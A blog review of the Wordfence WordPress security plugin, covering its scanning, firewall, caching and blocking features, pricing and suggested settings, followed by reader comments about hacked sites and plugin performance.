Dealing with WordPress hacks is a huge hassle. I have had the unfortunate experience of dealing with these tedious WordPress hacks many times during my web design career. There are a lot of security plugins for WordPress; it’s so hard to find the best one. There is one plugin that can drastically help protect your WordPress security, though. Take it from me; it is many net for your WordPress site. If I were to populate a list of “must have” plugins this would most certainly have to be on the list. It’s just that important. Its name is “Wordfence.” This plugin is very powerful, and I use it on all of my WordPress sites.
I found this excellent Wordfence YouTube video that shows you all the features of Wordfence:
Wordfence fights off scraper attempts, aggressive robots, fake bots, unauthorized login attempts ,and even strong brute force attacks. You can restore key WordPress files and revert back to earlier stages.
Okay, so first of all (and probably the best of all), this plugin is free. It, of course, has some premium or paid options, but they, are not entirely required, to begin with, just added features if you find yourself satisfied with the plugin’s performance. Basically, as a security plugin, it works by scanning your site for viruses, malware, adware, trojans, and other suspicious links on regular intervals throughout the day. Yeah, other security plugins also do this, but what’s good about this plugin is that it’s lightweight. It’s as if you don’t have a security plugin installed. It doesn’t slow down the loading of your pages or doesn’t even make you or your visitors feel as if something’s running in the background.
Once we have Wordfence installed on our website lets click on the Wordfence icon (or text) in our WordPress dashboard. You will want to find the “scan” text. Once you find it click on it. There you can click “start a Wordfence scan, ” and Wordfence will start scanning your website.
It checks the following:
- Scanning for HeartBleed vulnerability.
- Core theme & plugin signature files.
- Known malware files from Wordfence.
- Core WordPress files vs. originals in the repository.
- File contents for infections and vulnerability.
- Files/post/comments Google safe browsing list.
- Weak passwords.
- DNS for unauthorized changes.
- Disk space.
This typically takes about 2 minutes to scan your site. You can do something else on your website while it’s scanning (depending on how big your site is).
Next, there will be a box that says “new issues.” Will show you all the issues that Wordfence has found. You have the option to mark them as fixed, make the changes, and ignore. What I like about this plugin is it shows you when there are problems with a particular file. You have the option to view it next to its original source. You can then see what line of code is suspicious and restore it to the original core file.
More than just a security plugin, WordFence Security plugin also shows you real-time traffic, from human and non-human alike, bots, spiders, logins, and logouts – anything that hits your site. So, if you’re not getting information about these through your favorite analytics plugin, then this is a must have. However it can use a lot of resources which can cause speed/loading time problems on your website. So if you run into any troubles with loading times try disabling the live traffic feature.
Wordfence does offer many performance options. You can find these under Wordfence>performance setup. You can use caching so that the plugin doesn’t hog all your servers resources. There are three options:
- Disable all performance enhancements.
- Enabled basic caching. (2 to 3 times speed increase)
- Enabled Wordfence Falcon Engine. (30 to 50 times speed increase)
You can even configure cache options to work with SSL (secure https pages), add hidden debugging data to the bottom of the HTML source of a cached page, and clear cache when a scheduled post is published.
You can clear the cache of even get cache stats if you want.
You can add items like URLs, cookies, and browsers (user-agents) to exclude from caching. You can configure these with “if” statements which included URL starts with, URL ends with, URL contains, URL exactly matches, users-agent contains, User-agent exactly matches, and cookies name contains. Then you click “add exclusion.”
You can manage the IP addresses that are viewing your website. You can manually add different IP addresses to your log, lock IP’s out, and show IP’s that were recently throttled for accessing the site too frequently. So, if there is a problem and you think the IP address might be problematic, it’s as simple as just blocking it.
Cellphone settings are only available for those webmasters that have a premium membership. You can configure your setting by putting in your cell phone username and telephone number.
Also, a premium membership that allows you to block sites from different countries. You can send them to standard Wordfence blocked message or a custom URL. An excellent option if you see DDOS attacks or problems that are related from hackers in Turkey. Do love this feature from Wordfence.
Another premium feature of Wordfence is to schedule when Wordfence scans occur. You can do them anytime you want Monday through Sunday. Anytime you want. It’s a good idea to run scans a least once a week to ensure that your WordPress site isn’t infected with malware.
Any IP’s that look suspicious you can cut and paste their IP address and it will tell you everything about the IP. You don’t have to go to who.is or other “whois” site. It’s all done through your dashboard in WordPress.
Advanced blocking is available for free with Wordfence. You can block IP address ranges. Meaning that you can block 192.168.200.200 – 192.168.200.220. You can block user-agents too. To do this, you enter in something like this, *badRobot*, AnotherBadRobot*, *someBrowserSuffix. You can block people that were referred from specific websites. To do this you enter in *badWebsite*, AnotherBadWebsite*, *someWebsiteSuffix. Once, you block people there is a field where you can enter in your reason. Helps the developers at Wordfence to see exactly why you are blocking a certain site, IP, or user-agent. What a great idea from the developers of Wordfence!
I use the free version for all my websites. But you can purchase the paid version of Wordfence at Wordfence.com. Here is a breakdown of the prices per license:
- 1 API – $39.00/year.
- 2 API – $59.00/year.
- 3 API – $79.00/year.
- 4 API – $99.00/year.
- 5 API – $119.00/year.
You do get discounts for buying the premium service for more than 1 year. Currently, you can purchase it for up to 5 years.
Don’t just take my word for it. Wordfence is an excellent security plugin for WordPress. This plugin gets excellent reviews on WordPress.org. I have found some interesting reviews on Wordfence that you can view:
I highly recommend the Wordfence security plugin. There are some options that you can configure to your likings. The free version is worth it, and the paid version is worth the money. You have to play it safe with your WordPress sites. Every second, minute, hour, day, week, month, etc. that our websites are infected or down we are losing out on clients, visitors, and money. It’s easy to use, lightweight, and compatible with the latest versions of WordPress. This plugin has saved me an immense amount of time and headaches over the years. You can check out the plugin at https://wordpress.org/plugins/wordfence/
I want to hear what you think about this security plugin. If you have any questions, feedback, comments, etc., please leave your comments down below about Wordfence.
Looks like a good plugin to install. Thanks for sharing!
Under “alerts” make sure the following are checked:
“Alert on critical problems”
“Alert on warnings”
“Alert when IP address is blocked”
“Alert when some is locked out from login”
“Alert when the “lost password” form is used for valid user”
“Alert me when a non-admin user signs in”
With “scans” make sure everything is checked
Under “firewall rules” configure these settings:
Check “Immediately block fake Google crawlers”
Make sure “Verified Google crawlers have unlimited access to the site”
If anyone’s requests exceed: 240 per minute (4 per second) then throttle it
If a crawler’s page views exceed: 960 per minute (16 per second) then throttle it
If a crawler’s pages not found (404s) exceed: 960 per minute (16 per second) then throttle it
If a human’s page views exceed: 240 per minute (4 per second) then throttle it
If a human’s pages not found (404s) exceed: 240 per minute (4 per second) then throttle it
If 404’s for known vulnerable URL’s exceed: 120 per minute (2 per second) then throttle it
How long is an IP address blocked when it breaks a rule: 12 hours
For “login security options” options configure these settings:
Force admins and publishers to use strong passwords
Limited login failures and forgot password attempts to 5
Count failures and amount of time a user is locked out to 6 hours.
Make sure these are checked:
Immediately lock out invalid usernames
Don’t let WordPress reveal valid users in login errors
Prevent users registering ‘admin’ username if it doesn’t exist
Prevent discovery of usernames through ‘?/author=N’ scans
Hope this helps 🙂
Isso Beats says
Thanks for the article. I’ve been using the Wordfence free version for a while, but I’ve been getting a lot of chumps trying to hack into my site lately and I am buying the premium version today.
You should really check out this plugin than. The Wordfence security plugin is really a fantastic plugin. It will really help you a lot. There is a free and paid version. The free version is very helpful. I typically like to install it on any websites I run. If your theme gets hacked you can always revert back to a previous version of the framework. This has really helped saved me lots of time and hassles. Just last week one of my clients websites was hacked and all I did was revert back. It took 1 minute. I got $50 for 1 minute of work, so it makes sense for web design businesses too. You can even use their service and implement it into your sales funnel. Lots of business owners would be interested in that kind of service.
Kim D. says
I was wondering what do you think of the caching settings for Wordfence. I have used them in the past but they really don’t seem to be all that great? It seems to have conflicts with some other WordPress plugins.
I would have to say that I am really not a fan of Wordfences caching system. I do not use them It doesn’t seem to be quite as effective as WP Super Cache.
I would recommend disabling the caching for Wordfence. But, Wordfence is great for security!
Mats Schmid says
Outstanding article! Wordfence is definitely a must have plugin. I am using it for all my WordPress websites upon recommendation from my hosting provider. It has very useful features to protect my site from hackers.
Going to certainly make a couple adjustments that you have suggested. I am even using the Premium version, too. Love it!
I have used WordFence for several years now. This plugin has saved me time and time again. When files get infected, I really like how you can revert back to a previous version. It’s very easy to do and is a lifesaver. However, WordFence does let you know when text files are changed. These are mostly just read me files with plugins or themes. It’s kind of annoying, but I always just disregard those.
Yeah, I know what you mean about Wordfence telling you .txt files have been changed. There is a button that you can click that will just ignore them in the future. I have used this for years. Never do I see those messages again!
I read that that wordfence slows down your website; what do you make of this?
I haven’t noticed that WordFence slows down your website. Sometimes the live traffic feature can use too many resources for your setup and cause problems. Maybe try disabling that option if you haven’t already.
Kat Chang says
Hi Garen, thanks for the article! I have been using Wordfence for a month now, however, my sites have been hacked everyday this week despite having Wordfence on. I know its not 100%, and we can revert to the backup. It took the entire day to work out where the malware was (WF did not find it).
Will the premium version work better? What would your advice be?
Sometimes there are backdoors on your site or the server you are hosting your website on that security plugins would not be able to detect. There is a vulnerability somewhere that needs to be fixed. Have you asked your web host for help? Best of luck to you!